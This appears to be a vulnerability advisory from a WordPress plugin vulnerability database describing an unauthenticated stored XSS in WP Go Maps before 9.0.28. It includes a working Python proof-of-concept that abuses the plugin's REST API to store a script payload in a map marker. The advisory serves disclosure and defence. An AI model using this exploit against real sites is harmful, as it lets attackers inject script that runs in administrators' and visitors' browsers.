WordPress Plugin Vulnerabilities
WP Go Maps < 9.0.28 - Unauthenticated Stored XSS
Description
The plugin does not properly protect most of its REST API routes, which attackers can abuse to store malicious HTML/Javascript on the site.
Proof of Concept
Run the following Python script, then visit https://vulnerable-site.tld/wp-admin/admin.php?page=wp-google-maps-menu&action=edit&map_id=1. Alternatively, visit the page where the map is displayed after the fact and click on the affected marker to trigger the XSS. ``` import sys import requests if len(sys.argv) != 2: print(f'{sys.argv[0]} <target_site_root_url>') sys.exit() url = sys.argv[1].rstrip('/') # Get list of existing markers res = requests.get(f'{url}/wp-json/wpgmza/v1/markers').json() if len(res) == 0: print('# No markers found! Make sure the plugin is properly setup.') sys.exit() marker_id = res[0]['id'] print(f'# Found marker ID #{marker_id}, using it to demonstrate the exploit') print('# Tricking the POST section of the endpoint to store our XSS payload..') body = { 'address': '<img src="x" onerror=alert("xss")//">' } requests.post(f'{url}/wp-json/wpgmzA/v1/markers?_method=get&random=/wpgmza/v1/markers/{marker_id}', data=body) ```
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Original Researcher
Marc Montpas
Submitter
Marc Montpas
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-12-12 (about 5 months ago)
Added
2023-12-12 (about 5 months ago)
Last Updated
2023-12-12 (about 5 months ago)